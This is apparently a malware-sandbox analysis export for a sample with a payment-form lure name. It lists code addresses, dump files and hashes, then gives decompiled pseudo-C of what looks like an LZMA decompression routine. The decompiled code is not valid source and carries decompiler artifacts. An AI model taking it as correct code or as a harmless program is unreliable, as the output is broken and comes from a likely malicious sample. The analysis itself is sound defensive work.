0x00405fee
0x00405ff4
0x0040601e
0x00406024
0x0040602b
0x00000000
0x0040602b
0x00405ff6
0x00405ffa
0x00405ffd
0x00406002
0x00406002
0x0040600d
0x00406015
0x00406018
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0040605d
0x00406063
0x00406066
0x00406073
0x0040607b
0x00000000
0x00000000
0x00406032
0x00406032
0x00406036
0x00406881
0x00406881
0x00000000
0x00406881
0x0040603c
0x00406042
0x0040604d
0x0040604d
0x0040604d
0x00406050
0x00406053
0x00406056
0x0040605b
0x00000000
0x00000000
0x00000000
0x00000000
0x004066f2
0x004066f2
0x004066f8
0x004066fe
0x00406704
0x0040671e
0x00406721
0x00406727
0x00406732
0x00406732
0x00406734
0x00406706
0x00406706
0x00406715
0x00406719
0x00406719
0x0040673e
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406740
0x00406744
0x004068f3
0x004068f3
0x00000000
0x004068f3
0x0040674a
0x00406750
0x00406757
0x0040675f
0x00406762
0x00406765
0x00406765
0x0040676b
0x0040676b
0x00000000
0x00000000
0x00406083
0x00406083
0x00406085
0x00406088
0x004060f9
0x004060f9
0x004060fc
0x004060ff
0x00406106
0x00406110
0x00000000
0x00406110
0x0040608a
0x0040608a
0x0040608e
0x00406091
0x00406093
0x00406096
0x00406099
0x0040609b
0x0040609e
0x004060a0
0x004060a5
0x004060a8
0x004060ab
0x004060af
0x004060b6
0x004060b9
0x004060c0
0x004060c4
0x004060cc
0x004060cc
0x004060cc
0x004060c6
0x004060c6
0x004060c6
0x004060bb
0x004060bb
0x004060bb
0x004060d0
0x004060d3
0x004060f1
0x004060f1
0x004060f3
0x00000000
0x004060d5
0x004060d5
0x004060d5
0x004060d8
0x004060db
0x004060de
0x004060e0
0x004060e0
0x004060e0
0x004060e3
0x004060e6
0x004060e8
0x004060e9
0x004060ec
0x00000000
0x004060ec
0x00000000
0x00406322
0x00406322
0x00406326
0x00406344
0x00406344
0x00406347
0x0040634e
0x00406351
0x00406354
0x00406357
0x0040635a
0x0040635d
0x0040635f
0x00406366
0x00406367
0x00406369
0x0040636c
0x0040636f
0x00406372
0x00406372
0x00406377
0x00000000
0x00406377
0x00406328
0x00406328
0x0040632b
0x0040632e
0x00406338
0x00000000
0x00000000
0x0040638c
0x0040638c
0x00406390
0x004063b3
0x004063b6
0x004063b9
0x004063c3
0x00406392
0x00406392
0x00406395
0x00406398
0x0040639b
0x004063a8
0x004063ab
0x004063ab
0x00000000
0x00000000
0x004063cf
0x004063cf
0x004063d3
0x00000000
0x00000000
0x004063d9
0x004063d9
0x004063dd
0x00000000
0x00000000
0x004063e3
0x004063e3
0x004063e5
0x004063e9
0x004063e9
0x004063ec
0x004063f0
0x00000000
0x00000000
0x00406440
0x00406440
0x00406444
0x0040644b
0x0040644b
0x0040644e
0x00406451
0x0040645b
0x00000000
0x0040645b
0x00406446
0x00406446
0x00000000
0x00000000
0x00406467
0x00406467
0x0040646b
0x00406472
0x00406475
0x00406478
0x0040646d
0x0040646d
0x0040646d
0x0040647b
0x0040647e
0x00406481
0x00406481
0x00406484
0x00406487
0x0040648a
0x0040648a
0x0040648d
0x00406494
0x00406499
0x00000000
0x00000000
0x00406527
0x00406527
0x0040652b
0x004068c9
0x004068c9
0x00000000
0x004068c9
0x00406531
0x00406531
0x00406534
0x00406537
0x0040653b
0x0040653e
0x00406544
0x00406546
0x00406546
0x00406546
0x00406549
0x0040654c
0x00000000
0x00000000
0x0040611c
0x0040611c
0x00406120
0x0040688d
0x0040688d
0x00000000
0x0040688d
0x00406126
0x00406126
0x00406129
0x0040612c
0x00406130
0x00406133
0x00406139
0x0040613b
0x0040613b
0x0040613b
0x0040613e
0x00406141
0x00406141
0x00406144
0x00406147
0x00000000
0x00000000
0x0040614d
0x0040614d
0x00406153
0x00000000
0x00000000
0x00406159
0x00406159
0x0040615d
0x00406160
0x00406163
0x00406166
0x00406169
0x0040616a
0x0040616d
0x0040616f
0x00406175
0x00406178
0x0040617b
0x0040617e
0x00406181
0x00406184
0x00406187
0x004061a3
0x004061a6
0x004061a9
0x004061ac
0x004061b3
0x004061b7
0x004061b9
0x004061bd
0x00406189
0x00406189
0x0040618d
0x00406195
0x0040619a
0x0040619c
0x0040619e
0x0040619e
0x004061c0
0x004061c7
0x004061ca
0x00000000
0x004061d0
0x004061d0
0x00000000
0x004061d0
0x00000000
0x004061d5
0x004061d5
0x004061d9
0x00406899
0x00406899
0x00000000
0x00406899
0x004061df
0x004061df
0x004061e2
0x004061e5
0x004061e9
0x004061ec
0x004061f2
0x004061f4
0x004061f4
0x004061f4
0x004061f7
0x004061fa
0x004061fa
0x004061fa
0x00406200
0x00000000
0x00000000
0x00406202
0x00406202
0x00406205
0x00406208
0x0040620b
0x0040620e
0x00406211
0x00406214
0x00406217
0x0040621a
0x0040621d
0x00406220
0x00406238
0x0040623b
0x0040623e
0x00406241
0x00406241
0x00406244
0x00406248
0x0040624a
0x00406222
0x00406222
0x0040622a
0x0040622f
0x00406231
0x00406233
0x00406233
0x0040624d
0x00406254
0x00406257
0x00000000
0x00406259
0x00406259
0x00000000
0x00406259
0x00406257
0x0040625e
0x0040625e
0x0040625e
0x0040625e
0x00000000
0x00000000
0x00406299
0x00406299
0x0040629d
0x004068a5
0x004068a5
0x00000000
0x004068a5
0x004062a3
0x004062a3
0x004062a6
0x004062a9
0x004062ad
0x004062b0
0x004062b6
0x004062b8
0x004062b8
0x004062b8
0x004062bb
0x004062be
0x004062be
0x004062c4
0x00406262
0x00406262
0x00406265
0x00000000
0x00406265
0x004062c6
0x004062c6
0x004062c9
0x004062cc
0x004062cf
0x004062d2
0x004062d5
0x004062d8
0x004062db
0x004062de
0x004062e1
0x004062e4
0x004062fc
0x004062ff
0x00406302
0x00406305
0x00406305
0x00406308
0x0040630c
0x0040630e
0x004062e6
0x004062e6
0x004062ee
0x004062f3
0x004062f5
0x004062f7
0x004062f7
0x00406311
0x00406318
0x0040631b
0x00000000
0x0040631d
0x0040631d
0x00000000
0x0040631d
0x00000000
0x004065aa
0x004065aa
0x004065ae
0x004068d5
0x004068d5
0x00000000
0x004068d5
0x004065b4
0x004065b4
0x004065b7
0x004065ba
0x004065be
0x004065c1
0x004065c7
0x004065c9
0x004065c9
0x004065c9
0x004065cc
0x00000000
0x00000000
0x0040637a
0x0040637a
0x0040637d
0x00000000
0x00000000
0x004066b9
0x004066b9
0x004066bd
0x004066df
0x004066df
0x004066e2
0x004066ec
0x004066ef
0x004066ef
0x00000000
0x004066ef
0x004066bf
0x004066bf
0x004066c2
0x004066c6
0x004066c9
0x004066c9
0x004066cc
0x00000000
0x00000000
0x00406776
0x00406776
0x0040677a
0x00406798
0x00406798
0x00406798
0x00406798
0x0040679f
0x004067a6
0x004067ad
0x004067ad
0x004067b4
0x004067b7
0x004067be
0x00000000
0x004067c1
0x0040677c
0x0040677c
0x0040677f
0x00406782
0x00406785
0x0040678c
0x004066d0
0x004066d0
0x004066d3
0x00000000
0x00000000
0x00406867
0x00406867
0x0040686a
0x0040676b
0x0040676b
0x0040676b
0x00000000
0x00406771
0x00000000
0x004064a1
0x004064a1
0x004064a3
0x004064aa
0x004064ab
0x004064ad
0x004064b0
0x00000000
0x00000000
0x00000000
0x00000000
0x004067b4
0x004067b4
0x004067b7
0x004067be
0x00000000
0x004067c1
0x00000000
0x00000000
0x00000000
0x004064e6
0x004064e6
0x004064e9
0x0040651f
0x0040651f
0x0040664f
0x0040664f
0x0040664f
0x0040664f
0x00406652
0x00406652
0x00406655
0x00406657
0x004068e1
0x004068e1
0x00000000
0x004068e1
0x0040665d
0x0040665d
0x00406660
0x00000000
0x00000000
0x00406666
0x00406666
0x0040666a
0x0040666d
0x0040666d
0x0040666d
0x00000000
0x0040666d
0x004064eb
0x004064eb
0x004064ed
0x004064ef
0x004064f1
0x004064f4
0x004064f5
0x004064f7
0x004064f9
0x004064fc
0x004064ff
0x00406515
0x00406515
0x0040651a
0x00406552
0x00406552
0x00406556
0x0040657f
0x00406582
0x00406584
0x0040658b
0x0040658e
0x00406591
0x00406591
0x00406596
0x00406596
0x00406598
0x0040659b
0x004065a2
0x004065a5
0x004065d2
0x004065d2
0x004065d5
0x004065d8
0x0040664c
0x0040664c
0x0040664c
0x0040664c
0x00000000
0x0040664c
0x004065da
0x004065da
0x004065e0
0x004065e3
0x004065e6
0x004065e9
0x004065ec
0x004065ef
0x004065f2
0x004065f5
0x004065f8
0x004065fb
0x00406614
0x00406616
0x00406619
0x0040661a
0x0040661d
0x0040661f
0x00406622
0x00406624
0x00406626
0x00406629
0x0040662b
0x0040662e
0x00406632
0x00406634
0x00406634
0x00406635
0x00406638
0x0040663b
0x004065fd
0x004065fd
0x00406605
0x0040660a
0x0040660c
0x0040660f
0x0040660f
0x0040663e
0x00406645
0x004065cf
0x004065cf
0x004065cf
0x004065cf
0x00000000
0x00406647
0x00406647
0x00000000
0x00406647
0x00406645
0x00406558
0x00406558
0x0040655b
0x0040655d
0x00406560
0x00406563
0x00406566
0x00406568
0x0040656b
0x0040656e
0x0040656e
0x00406571
0x00406571
0x00406574
0x0040657b
0x0040654f
0x0040654f
0x0040654f
0x0040654f
0x00000000
0x0040657d
0x0040657d
0x00000000
0x0040657d
0x0040657b
0x00406501
0x00406501
0x00406504
0x00406506
0x00406509
0x00000000
0x00000000
0x00406268
0x00406268
0x0040626c
0x004068b1
0x004068b1
0x00000000
0x004068b1
0x00406272
0x00406272
0x00406275
0x00406278
0x0040627b
0x0040627e
0x00406281
0x00406284
0x00406286
0x00406289
0x0040628c
0x0040628f
0x00406291
0x00406291
0x00406291
0x00000000
0x00000000
0x004063f3
0x004063f3
0x004063f7
0x004068bd
0x004068bd
0x00000000
0x004068bd
0x004063fd
0x004063fd
0x00406400
0x00406403
0x00406406
0x00406408
0x00406408
0x00406408
0x0040640b
0x0040640e
0x00406411
0x00406414
0x00406417
0x0040641a
0x0040641b
0x0040641d
0x0040641d
0x0040641d
0x00406420
0x00406423
0x00406426
0x00406429
0x00406429
0x00406429
0x0040642c
0x0040642e
0x0040642e
0x00000000
0x00000000
0x00406670
0x00406670
0x00406670
0x00406674
0x00000000
0x00000000
0x0040667a
0x0040667a
0x0040667d
0x00406680
0x00406683
0x00406685
0x00406685
0x00406685
0x00406688
0x0040668b
0x0040668e
0x00406691
0x00406694
0x00406697
0x00406698
0x0040669a
0x0040669a
0x0040669a
0x0040669d
0x004066a0
0x004066a3
0x004066a6
0x004066a9
0x004066ad
0x004066af
0x004066b2
0x00000000
0x004066b4
0x004066b4
0x00406431
0x00406431
0x00000000
0x00406431
0x004066b2
0x004068e7
0x004068e7
0x00000000
0x00000000
0x00405f16
0x0040691e
0x0040691e
0x00000000
0x0040691e
0x0040676b
0x004067eb
0x004067b4

Memory Dump Source

Source File: 00000000.00000002.314228611.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.314224629.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314262962.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314268114.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314271950.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314296536.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314349333.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314354423.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_#U00d6DEME FORMU.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 85c2319303355fc0c7b787500bfeece2c01703876a1250618e361b8f969aa208
Instruction ID: fb01dad5a0cc1219e3999a8d2bb186b1e56f72b4220c9c95c749fe4814af579a
Opcode Fuzzy Hash: 85c2319303355fc0c7b787500bfeece2c01703876a1250618e361b8f969aa208
Instruction Fuzzy Hash: 0CA15471D00229CBDF28CFA8C8447ADBBB1FB44305F15816AD856BB281D7785A96DF44

Uniqueness

Uniqueness Score: -1.00%

Function 004066B9 Relevance: 5.2, APIs: 4, Instructions: 208
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E004066B9() {
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int* _t605;
				void* _t612;

				L0:
				while(1) {
					L0:
					if( *(_t612 - 0x40) != 0) {
						 *(_t612 - 0x84) = 0x13;
						_t605 =  *((intOrPtr*)(_t612 - 0x58)) + 2;
						goto L132;
					} else {
						__eax =  *(__ebp - 0x4c);
						 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
						__ecx =  *(__ebp - 0x58);
						__eax =  *(__ebp - 0x4c) << 4;
						__eax =  *(__ebp - 0x58) + __eax + 4;
						L130:
						 *(__ebp - 0x58) = __eax;
						 *(__ebp - 0x40) = 3;
						L144:
						 *(__ebp - 0x7c) = 0x14;
						L145:
						__eax =  *(__ebp - 0x40);
						 *(__ebp - 0x50) = 1;
						 *(__ebp - 0x48) =  *(__ebp - 0x40);
						L149:
						if( *(__ebp - 0x48) <= 0) {
							__ecx =  *(__ebp - 0x40);
							__ebx =  *(__ebp - 0x50);
							0 = 1;
							__eax = 1 << __cl;
							__ebx =  *(__ebp - 0x50) - (1 << __cl);
							__eax =  *(__ebp - 0x7c);
							 *(__ebp - 0x44) = __ebx;
							while(1) {
								L140:
								 *(_t612 - 0x88) = _t533;
								while(1) {
									L1:
									_t534 =  *(_t612 - 0x88);
									if(_t534 > 0x1c) {
										break;
									}
									switch( *((intOrPtr*)(_t534 * 4 +  &M00406926))) {
										case 0:
											if( *(_t612 - 0x6c) == 0) {
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											_t534 =  *( *(_t612 - 0x70));
											if(_t534 > 0xe1) {
												goto L171;
											}
											_t538 = _t534 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t569);
											_push(9);
											_pop(_t570);
											_t608 = _t538 / _t569;
											_t540 = _t538 % _t569 & 0x000000ff;
											asm("cdq");
											_t603 = _t540 % _t570 & 0x000000ff;
											 *(_t612 - 0x3c) = _t603;
											 *(_t612 - 0x1c) = (1 << _t608) - 1;
											 *((intOrPtr*)(_t612 - 0x18)) = (1 << _t540 / _t570) - 1;
											_t611 = (0x300 << _t603 + _t608) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t612 - 0x78))) {
												L10:
												if(_t611 == 0) {
													L12:
													 *(_t612 - 0x48) =  *(_t612 - 0x48) & 0x00000000;
													 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t611 = _t611 - 1;
													 *((short*)( *(_t612 - 4) + _t611 * 2)) = 0x400;
												} while (_t611 != 0);
												goto L12;
											}
											if( *(_t612 - 4) != 0) {
												GlobalFree( *(_t612 - 4));
											}
											_t534 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t612 - 4) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t612 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t612 - 0x6c);
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 1;
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x40) =  *(_t612 - 0x40) | ( *( *(_t612 - 0x70)) & 0x000000ff) <<  *(_t612 - 0x48) << 0x00000003;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											_t45 = _t612 - 0x48;
											 *_t45 =  *(_t612 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t612 - 0x48) < 4) {
												goto L13;
											}
											_t546 =  *(_t612 - 0x40);
											if(_t546 ==  *(_t612 - 0x74)) {
												L20:
												 *(_t612 - 0x48) = 5;
												 *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) =  *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											 *(_t612 - 0x74) = _t546;
											if( *(_t612 - 8) != 0) {
												GlobalFree( *(_t612 - 8));
											}
											_t534 = GlobalAlloc(0x40,  *(_t612 - 0x40)); // executed
											 *(_t612 - 8) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t553 =  *(_t612 - 0x60) &  *(_t612 - 0x1c);
											 *(_t612 - 0x84) = 6;
											 *(_t612 - 0x4c) = _t553;
											_t605 =  *(_t612 - 4) + (( *(_t612 - 0x38) << 4) + _t553) * 2;
											goto L132;
										case 3:
											L21:
											__eflags =  *(_t612 - 0x6c);
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 3;
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											_t67 = _t612 - 0x70;
											 *_t67 =  &(( *(_t612 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
											L23:
											 *(_t612 - 0x48) =  *(_t612 - 0x48) - 1;
											if( *(_t612 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t531 =  *_t605;
											_t588 = _t531 & 0x0000ffff;
											_t564 = ( *(_t612 - 0x10) >> 0xb) * _t588;
											if( *(_t612 - 0xc) >= _t564) {
												 *(_t612 - 0x10) =  *(_t612 - 0x10) - _t564;
												 *(_t612 - 0xc) =  *(_t612 - 0xc) - _t564;
												 *(_t612 - 0x40) = 1;
												_t532 = _t531 - (_t531 >> 5);
												__eflags = _t532;
												 *_t605 = _t532;
											} else {
												 *(_t612 - 0x10) = _t564;
												 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
												 *_t605 = (0x800 - _t588 >> 5) + _t531;
											}
											if( *(_t612 - 0x10) >= 0x1000000) {
												goto L139;
											} else {
												goto L137;
											}
										case 5:
											L137:
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 5;
												goto L170;
											}
											 *(_t612 - 0x10) =  *(_t612 - 0x10) << 8;
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
											L139:
											_t533 =  *(_t612 - 0x84);
											goto L140;
										case 6:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											goto L132;
										case 8:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xa;
												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
											} else {
												__eax =  *(__ebp - 0x38);
												__ecx =  *(__ebp - 4);
												__eax =  *(__ebp - 0x38) + 0xf;
												 *(__ebp - 0x84) = 9;
												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
											}
											goto L132;
										case 9:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L90;
											}
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t259 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t259;
											0 | _t259 = _t259 + _t259 + 9;
											 *(__ebp - 0x38) = _t259 + _t259 + 9;
											goto L76;
										case 0xa:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											__eax =  *(__ebp - 0x28);
											goto L89;
										case 0xb:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L89:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L90:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L100:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t335 = __ebp - 0x70;
											 *_t335 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t335;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L102;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t122 = __ebp - 0x70;
											 *_t122 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t122;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L39:
											__eax =  *(__ebp - 0x40);
											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
												goto L48;
											}
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												goto L54;
											}
											L41:
											__eax =  *(__ebp - 0x5b) & 0x000000ff;
											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
											__ecx =  *(__ebp - 0x58);
											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
											 *(__ebp - 0x48) = __eax;
											__eax = __eax + 1;
											__eax = __eax << 8;
											__eax = __eax + __ebx;
											__esi =  *(__ebp - 0x58) + __eax * 2;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edx = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												 *(__ebp - 0x40) = 1;
												__cx = __ax >> 5;
												__eflags = __eax;
												__ebx = __ebx + __ebx + 1;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edx;
												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L39;
											} else {
												goto L37;
											}
										case 0xe:
											L46:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t156 = __ebp - 0x70;
											 *_t156 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t156;
